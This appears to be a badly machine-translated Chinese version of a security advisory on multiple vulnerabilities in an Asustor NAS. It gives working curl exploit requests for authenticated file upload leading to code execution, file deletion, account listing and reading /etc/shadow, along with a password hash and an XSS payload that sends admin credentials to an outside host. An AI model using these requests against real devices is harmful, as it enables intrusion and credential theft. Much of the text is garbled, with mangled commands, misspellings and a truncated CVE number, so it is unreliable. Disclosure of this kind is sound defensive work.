在研究Asstor As-202TNAS时,可租性发现多重漏洞
CVE-2018-15694认证文件上传
认证远程非行政攻击者可以在目标文件系统任何地方上传文件目标总是命名上传文件WallPaper_1.j.ifweb服务器特征启动后远程非认证攻击者可写字实现远程代码执行/cgi-bin/
excell-k-xPOST-HCente-Type:多段/格式数据boundary=-pwned-' --data-binary $'-pwned-\x0d\x0aContent-Disposition: form-data!filename=\"1.jpg\"\x0d\x0a\x0d\x0a#!/bin/sh\x0aecho -e \"Content-Type: text/plain\\n\\n\";id;uname -a;cat /etc/shadow\x0d\x0a-pwned-\x0d\x0a' $'https://192.168.1.10:8001/portal/apis/wallpaper/uploadwallpaper.cgi?sid=9dpDW4U9jUm.2HNb&act=upload&appdirpath=../../../share/Web/cgi-bin/' { "success": true } $ curl -k http://192.168.1.10:80/cgi-bin/WallPaper_1.jpg uid=999(admin) gid=999(administrators) groups=100(users),997(nvradmins),999(administrators) Linux Clarke 3.10.70 #1 SMP Wed Jun 13 01:06:06 CST 2018 armv7l GNU/Linux root:$1$WRyOw/55$eN4aG9y2Mc6GFsQ1SMLSm.:17599:0:99999:7::: avahi:*:15259:0:99999:7::: ...
CVE-2018-15695认证任意文件删除
认证远程非行政用户可删除文件系统上的任何文件,原因是路径遍历易懂墙纸.cgi.
$ curl -k "https://192.168.1.10:8001/portal/apis/wallpaper/wallpaper.cgi?sid=2LEyW3.EhAYUCWVF&act=removewallpaper&appdirpath=../../../tmp&file=test.file" { "success": true }
CVE-2018-15696认证账户编号
认证远程非行政用户可以通过设备登录所有账号user.cgi.
$ curl -s -k "https://192.168.1.10:8001/portal/apis/accessControl/user.cgi?sid=C8wyW20b6wYUz31g&act=list&start=0&limit=0&domain=0" | python -m json.tool { "datas": [ { "description": "guest", "email": "", "group": "-", "name": "guest", "primary_gid": 65534, "status": "Inactive", "uid": 998 }, { "description": "Admin", "email": "", "group": "administrators", "name": "admin", "primary_gid": 999, "status": "Active", "uid": 999 }, { "description": "", "email": "", "group": "users", "name": "courtney", "primary_gid": 100, "status": "Active", "uid": 1000 }, { "description": "", "email": "", "group": "users", "name": "lab", "primary_gid": 100, "status": "Active", "uid": 1001 } ], "success": true, "total": 4 }
CVE-2018-15697认证文件披露
认证远程非行政用户可访问NAS共享文件,在请求中指定全文件路径downloadwallpaper.cgi.下例中,bash历史文件取自/Home/admin/.
exstat-anNetstat-aNetstat51417tcpp
CVE-2018-15698认证文件披露
远程认证行政用户通过向远程目标发送请求读取文件内容日志.cgi.
$ curl -k "https://192.168.1.10:8001/portal/apis/settings/loginimage.cgi?sid=4K4yW-gqeQazweZ0&act=preview&file=/etc/shadow" root:$1$WRyOw/55$eN4aG9y2Mc6GFsQ1SMLSm.:17599:0:99999:7:::
CVE-2018-1569:MITMXSS
远程行政用户先认证NAS执行awget大全至http://update.asustor.com/adm_update.php?architecture=armv7l&model=AS1004T&version=3.1.0.RFQ3&initialized=true并剖析结果.conf文件.下举示例文件 :
模型Name = AS10XXT版本 = 3.1.4.RID1发布日期= 2018/06/14发布注
中间人可以修改版本字段以注入窃取管理员证书的Jaavascript例举 :
版本=pnme![](http://192.168.1.237/pwn?c=)